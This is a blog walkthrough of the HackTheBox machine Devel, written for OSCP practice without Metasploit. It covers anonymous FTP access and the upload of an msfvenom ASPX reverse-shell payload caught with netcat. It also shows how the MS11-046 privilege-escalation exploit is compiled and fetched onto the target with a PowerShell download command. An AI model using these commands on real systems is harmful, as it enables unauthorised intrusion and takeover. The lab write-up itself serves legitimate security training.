DEV Community

loading...

Writeup: HackTheBox Devel- Without Metasploit (OSCP Prep)

0xhuey profile image Chris 'Huey' S ・6 min read

Devel HackTheBox Write up

Hello Again! My name is 0xHuey and I will be sharing my HackTheBox walk-through without Metasploit as I prepare for the GIAC GPEN and OSCP. For those that didn't read my previous post, Metasploit is an extremely powerful pentesting tool that automates a lot of the task I will be doing manually. My goal here is to learn how these tools are actually run so that I can become a better infosec enthusiast. So with that said, Lets Begin!!!

Difficulty level: Easy-ish
30mins no water break and some googling

I start off with running a general Nmap Scan to see the services running and for the ports.
Alt Text

Some background on what I am doing here.
-sV = version detection scan
-sC = runs default scripts
-v = verbose
-Pn = checks to see if the host is alive
-p- = scans all ports
-A = detailed information on scripts
-T4 = speed things up

So from the top, we see an open FTP server with looks to allow anonymous logins. Next we can see that there is a site there, because port 80 is open with http. Nmap also gives us their guess on the type of machine that it is currently running which is a Windows 8.
Alt Text

Being that there is a potential website I will try to see what is there. Go to the 10.10.10.5:80 site. We should be greeted with an Internet Information Services landing page. This is a Microsoft web server. If we do some further reading it looks like IIS7 shipped to windows vista and windows server 2008.

Alt Text

Besides this landing page I don't really see much else. So I right-click and select inspect source. After looking at the page though I also don't really see much here.

Alt Text

I decide to run dirb on the site to check to see if there are any hidden publicly available web pages. Do the following from your linux machine.

dirb http://10.10.10.5/
Alt Text

After sometime I am able to get some results from the scan but after going to the locations from my browser I am greeted with a "403 - Forbidden: Access is denied." window :-(
Alt Text

So my next avenue is to try the FTP Server I found. Using the anonymous login with a random password. It doesn't really matter what you type in. But for this walk-through lets stick with the following anonymous:anonymous. To invoke the ftp do the following ftp 10.10.10.5.
Alt Text

So once you are in run the Ls -al to list the contents of your remote directory.

Being that I am able to get into this file and see that the iisstart.htm was apart of what I found earlier. Let me see if I can upload a file to the FTP and display it on a page.

On my linux machine I am going to run the following commands cat > huey.txt and I am going to type Hello

Alt Text

By the time that you've created this txt file the FTP Server will have kicked you out. So don't worry and just log back in with the creds from earlier. Now after getting access, you will need to use the put command to place the file in the FTP Server. So it will be put Huey.txt or whatever you call your file. Be sure that you are in the correct file path when you log into the Server. So if you've saved the txt file to your desktop you will be in that path on your Server. So it would be /root/Desktop then login to your FTP...
Alt Text

After running the put command you will need to Ls -al to see if the file is actually in there.

Here is where I got a little hung and I had to do a little bit of trial/error. After doing some googling I found that Aspnet_Client is apart of the ASP.NET framework that either runs with the ASP or ASPX depending on when it was pushed.

MSFvenom is a great resource to create payloads on the fly to get access to your victim machine.

For more detailed reading on MSFvenom, check out the Offensive-Security page for a quick run down.
https://www.offensive-security.com/metasploit-unleashed/msfvenom/

I found the following script that I am going to use to generate a payload. Type in the following in your correct download path msfvenom -p windows/shell_reverse_tcp LHOST=Your IP LPORT=5555 -f aspx > huey.aspx

The goal of this payload is to achieve an reverse shell back to my machine giving me further access.
Alt Text

Now go back to the FTP Server and put this file in there just like the other dummy txt file.
Alt Text

Bring up another window and run the nc -lvp 5555 command to start listening for the shell. As you can see from the screenshot, I tried some asp files but I had little luck in gaining access.
Alt Text

Okay, so here is where it gets interesting. You created a new webpage for the site and will need to go to that page to execute the exploit. Type in 10.10.10.5/yourfile.aspx
Alt Text

Now if you go back to the listener, you should see a catch.
Alt Text

This is fantastic! But something is off when we run the whoami command. You will see that you do not have administrative privileges.
Alt Text

So if you've ever used Metasploit you know that after getting a shell on a victim machine you can run the getuid command and you will privsec very easily. But if you are not using this tool then things can get a little harder.

So while I am in the box I run the sysinfo command to see what I am really dealing and confirm a few things. What you can see that its a Microsoft Windows 7 Enterprise Machine.
Alt Text

I go back to google and start looking for a privsec exploit.

I come across the following exploit that should allow me to conduct a Privsec on the victim machine.
Alt Text

If you scroll down on the page it provides clear instructions on how to compile it on the victim machine
Alt Text

Make sure to run i686-w64-mingw32-gcc MS11-046.c -o MS11-046.exe -lws2_32 this command from your linux machine when compiling it.
Alt Text

Now run a python web server from your Linux machine. This can be used on the fly to share files/data between machines.

Please do the following **python -m SimpleHTTPServer 9005.
Alt Text

I will now upload that code to my victim machine by using the following command with powershell
powershell -c "(new-object System.Net.WebClient).DownloadFile('hxxp://Your IP:9005/40564.exe', 'c:\root\Downloads\40564.exe')"

Now we check the download files to see if its in there.

Once I confirmed that its in there I will compile the code by running the 40564.exe command.

Now re-try the whoami command to check your privileges.
Alt Text

Boom we are in!

After some searching I come across the following two files:
Alt Text
Alt Text

Discussion (0)

Forem Open with the Forem app